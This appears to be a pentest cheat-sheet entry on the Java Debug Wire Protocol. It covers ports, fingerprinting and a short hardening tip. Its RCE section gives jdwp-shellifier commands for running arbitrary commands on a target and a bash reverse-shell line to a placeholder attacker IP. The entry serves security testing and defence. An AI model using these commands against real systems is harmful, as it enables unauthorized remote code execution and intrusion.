JDWP (Java Debug Wire Protocol)
aka java-debug
Java's remote debugging protocol, often on 8000 (or random). It has no authentication by design — anyone who can reach it can invoke methods in the running JVM, which means instant remote code execution.
Ports
| Port | Proto | Notes |
|---|---|---|
8000 | tcp | common JDWP port |
8453 | tcp | alt JDWP port |
Fingerprint
- Sending 'JDWP-Handshake' returns the same string
- nmap detects 'Java Debug Wire Protocol'
Exploitation primitives
- No auth by design — invoke java.lang.Runtime.exec() in the target JVM for RCE
- jdwp-shellifier automates command execution / reverse shells
- Runs as the JVM's user (frequently a service or even root)
Overview
JDWP on 8000 is for attaching a debugger to a JVM. Because debugging is arbitrary code execution, an exposed JDWP port is unauthenticated RCE.
Enumeration
Confirm JDWP with the handshake:
echo -en "JDWP-Handshake" | nc -nv <TARGET> 8000nmap:
nmap -p8000 --script jdwp-version <TARGET>RCE
Run a command in the JVM:
python2 jdwp-shellifier.py -t <TARGET> -p 8000 --cmd "id"Reverse shell:
python2 jdwp-shellifier.py -t <TARGET> -p 8000 --cmd "bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1'"Hardening
Never expose JDWP — only bind the debug agent to localhost (address=127.0.0.1:8000) and only enable it when actively debugging.